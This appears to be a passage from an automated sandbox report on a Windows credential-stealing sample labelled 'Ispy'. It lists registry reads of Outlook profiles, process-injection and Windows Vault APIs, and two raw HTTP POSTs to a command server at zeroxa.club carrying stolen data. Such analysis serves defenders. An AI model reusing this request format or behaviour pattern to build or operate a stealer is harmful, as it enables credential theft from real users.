HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\E115DF6A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
D448845E628773E4A9A809DA

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
kernel32.dll.QueryActCtxW
ole32.dll.CoGetContextToken
kernel32.dll.GetFullPathNameW
kernel32.dll.GetVersionExW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
uxtheme.dll.IsAppThemed
kernel32.dll.CreateActCtxA
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
user32.dll.RegisterWindowMessageW
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
advapi32.dll.CryptAcquireContextW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGetProvParam
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
advapi32.dll.CryptContextAddRef
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptContextAddRef
advapi32.dll.CryptDuplicateKey
cryptsp.dll.CryptDuplicateKey
advapi32.dll.CryptSetKeyParam
cryptsp.dll.CryptSetKeyParam
advapi32.dll.CryptDecrypt
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptReleaseContext
kernel32.dll.DeleteFileW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.FindAtomW
kernel32.dll.AddAtomW
mscoree.dll.LoadLibraryShim
gdiplus.dll.GdiplusStartup
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipLoadImageFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageType
gdiplus.dll.GdipGetImageRawFormat
kernel32.dll.SwitchToThread
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipGetImageEncodersSize
kernel32.dll.LocalAlloc
gdiplus.dll.GdipGetImageEncoders
kernel32.dll.RtlMoveMemory
kernel32.dll.LocalFree
gdiplus.dll.GdipSaveImageToStream
gdiplus.dll.GdipCreateBitmapFromStream
gdiplus.dll.GdipBitmapLockBits
gdiplus.dll.GdipBitmapUnlockBits
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptEncrypt
kernel32.dll.GlobalMemoryStatusEx
shell32.dll.SHGetSpecialFolderPathW
kernel32.dll.GetProcAddress
kernel32.dll.CreateProcessW
ntdll.dll.NtAlertResumeThread
ntdll.dll.NtGetContextThread
ntdll.dll.NtSetContextThread
ntdll.dll.NtUnmapViewOfSection
ntdll.dll.NtWriteVirtualMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
ole32.dll.CoWaitForMultipleHandles
kernel32.dll.DeleteAtom
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
cryptsp.dll.CryptGenRandom
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
netapi32.dll.NetUserGetInfo

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\documents.exe"
C:\Windows\system32\lsass.exe

Started Services

VaultSvc

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-08-31 05:29:55 2018-08-31 05:32:55 180

2 HTTP Request(s) detected

http://zeroxa.club/mem/fre.php
  • Hostname: zeroxa.club
  • IP Address:
  • Port: 80
  • Count: 2

POST /mem/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: zeroxa.club
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BF8961C8
Content-Length: 192
Connection: close

http://zeroxa.club/mem/fre.php
  • Hostname: zeroxa.club
  • IP Address:
  • Port: 80
  • Count: 3

POST /mem/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: zeroxa.club
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BF8961C8
Content-Length: 165
Connection: close

#infosec #automation

TheSystem Itself @ 2018-08-31 05:36:11

Detected family: #Ispy

TheSystem Itself @ 2018-08-31 05:46:04